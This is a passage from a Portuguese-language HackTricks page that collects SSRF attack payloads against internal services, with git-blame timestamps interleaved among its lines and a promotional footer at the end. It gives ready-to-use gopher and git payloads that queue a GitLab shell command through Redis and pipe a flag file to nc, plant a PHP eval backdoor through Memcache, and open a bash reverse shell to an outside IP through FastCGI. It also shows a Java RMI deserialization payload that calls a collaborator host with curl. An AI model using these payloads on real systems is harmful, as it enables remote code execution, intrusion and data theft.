Embora isso tenha exigido acesso autenticado ao GitLab para explorar, estou incluindo o payload aqui, pois o protocolo `git` pode funcionar no alvo que você está hackeando. Este payload é para referência.
2022-02-13 12:30:13 +00:00
```bash
git://[0:0:0:0:0:ffff:127.0.0.1]:6379/%0D%0A%20multi%0D%0A%20sadd%20resque%3Agitlab%3Aqueues%20system%5Fhook%5Fpush%0D%0A%20lpush%20resque%3Agitlab%3Aqueue%3Asystem%5Fhook%5Fpush%20%22%7B%5C%22class%5C%22%3A%5C%22GitlabShellWorker%5C%22%2C%5C%22args%5C%22%3A%5B%5C%22class%5Feval%5C%22%2C%5C%22open%28%5C%27%7Ccat%20%2Fflag%20%7C%20nc%20127%2E0%2E0%2E1%202222%5C%27%29%2Eread%5C%22%5D%2C%5C%22retry%5C%22%3A3%2C%5C%22queue%5C%22%3A%5C%22system%5Fhook%5Fpush%5C%22%2C%5C%22jid%5C%22%3A%5C%22ad52abc5641173e217eb2e52%5C%22%2C%5C%22created%5Fat%5C%22%3A1513714403%2E8122594%2C%5C%22enqueued%5Fat%5C%22%3A1513714403%2E8129568%7D%22%0D%0A%20exec%0D%0A%20exec%0D%0A/ssrf123321.git
```
2023-07-13 10:23:45 +00:00
## Memcache
2022-02-13 12:30:13 +00:00
2024-01-01 18:32:14 +00:00
**Porta comum: 11211**
2022-02-13 12:30:13 +00:00
* [vBulletin Memcache RCE ](https://www.exploit-db.com/exploits/37815 )
* [GitHub Enterprise Memcache RCE ](https://www.exploit-db.com/exploits/42392 )
2023-06-06 18:56:34 +00:00
* [Exemplo de payload Gopher para Memcache ](https://blog.safebuff.com/2016/07/03/SSRF-Tips/#SSRF-memcache-Getshell )
2022-02-13 12:30:13 +00:00
```bash
gopher://[target ip]:11211/_%0d%0aset ssrftest 1 0 147%0d%0aa:2:{s:6:"output";a:1:{s:4:"preg";a:2:{s:6:"search";s:5:"/.*/e";s:7:"replace";s:33:"eval(base64_decode($_POST[ccc]));";}}s:13:"rewritestatus";i:1;}%0d%0a
gopher://192.168.10.12:11211/_%0d%0adelete ssrftest%0d%0a
```
2023-07-13 10:23:45 +00:00
## Apache Tomcat
2022-02-13 12:30:13 +00:00
2024-01-01 18:32:14 +00:00
**Portas comuns: 80,443 (SSL),8080,8443 (SSL)**
2022-02-13 12:30:13 +00:00
2024-01-01 18:32:14 +00:00
Efetivo apenas contra Tomcat 6:
2022-02-13 12:30:13 +00:00
[gopher-tomcat-deployer ](https://github.com/pimps/gopher-tomcat-deployer )
2024-01-01 18:32:14 +00:00
Writeup de CTF usando esta técnica:
2022-02-13 12:30:13 +00:00
2023-12-16 14:29:43 +00:00
[De XXE para RCE: Pwn2Win CTF 2018 Writeup ](https://bookgin.tw/2018/12/04/from-xxe-to-rce-pwn2win-ctf-2018-writeup/ )
2022-02-13 12:30:13 +00:00
2023-07-13 10:23:45 +00:00
## FastCGI
2022-02-13 12:30:13 +00:00
2024-01-01 18:32:14 +00:00
**Portas comuns: 80,443 (SSL)**
2022-02-13 12:30:13 +00:00
2023-10-26 14:38:17 +00:00
Isso foi retirado [daqui ](https://blog.chaitin.cn/gopher-attack-surfaces/ ).
2022-02-13 12:30:13 +00:00
```bash
gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%10%00%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH97%0E%04REQUEST_METHODPOST%09%5BPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Asafe_mode%20%3D%20Off%0Aauto_prepend_file%20%3D%20php%3A//input%0F%13SCRIPT_FILENAME/var/www/html/1.php%0D%01DOCUMENT_ROOT/%01%04%00%01%00%00%00%00%01%05%00%01%00a%07%00%3C%3Fphp%20system%28%27bash%20-i%20%3E%26%20/dev/tcp/172.19.23.228/2333%200%3E%261%27%29%3Bdie%28%27-----0vcdb34oju09b8fd-----%0A%27%29%3B%3F%3E%00%00%00%00%00%00%00
```
2023-07-13 10:23:45 +00:00
## Java RMI
2022-02-13 12:30:13 +00:00
2024-01-01 18:32:14 +00:00
**Portas comumente vinculadas: 1090,1098,1099,1199,4443-4446,8999-9010,9999**
2022-02-13 12:30:13 +00:00
2024-01-01 18:32:14 +00:00
Vulnerabilidades _SSRF_ cegas que permitem bytes arbitrários (_baseados em gopher_) podem ser usadas para realizar ataques de desserialização ou de base de código nos componentes padrão do _Java RMI_ (_RMI Registry_, _Distributed Garbage Collector_ , _Activation System_ ). Um artigo detalhado pode ser encontrado [aqui ](https://blog.tneitzel.eu/posts/01-attacking-java-rmi-via-ssrf/ ). A listagem a seguir mostra um exemplo para a geração de payload:
2022-02-13 12:30:13 +00:00
```
$ rmg serial 127.0.0.1 1090 CommonsCollections6 'curl example.burpcollaborator.net' --component reg --ssrf --gopher
[+] Creating ysoserial payload... done.
[+]
[+] Attempting deserialization attack on RMI Registry endpoint...
[+]
[+] SSRF Payload: gopher://127.0.0.1:1090/_%4a%52%4d%49%00%02%4c%50%ac%ed%00%05%77%22%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%02%44%15%4d[...]
```
2022-04-28 16:01:33 +00:00
< details >
2024-01-01 18:32:14 +00:00
< summary > < strong > Aprenda hacking no AWS do zero ao herói com< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
Outras formas de apoiar o HackTricks:
2022-04-28 16:01:33 +00:00
2024-01-01 18:32:14 +00:00
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** , confira os [**PLANOS DE ASSINATURA** ](https://github.com/sponsors/carlospolop )!
* Adquira o [**material oficial PEASS & HackTricks** ](https://peass.creator-spring.com )
* Descubra [**A Família PEASS** ](https://opensea.io/collection/the-peass-family ), nossa coleção de [**NFTs** ](https://opensea.io/collection/the-peass-family ) exclusivos
* **Junte-se ao grupo** 💬 [**Discord** ](https://discord.gg/hRep4RUj7f ) ou ao grupo [**telegram** ](https://t.me/peass ) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/carlospolopm )**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) e [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ).
2022-04-28 16:01:33 +00:00
< / details >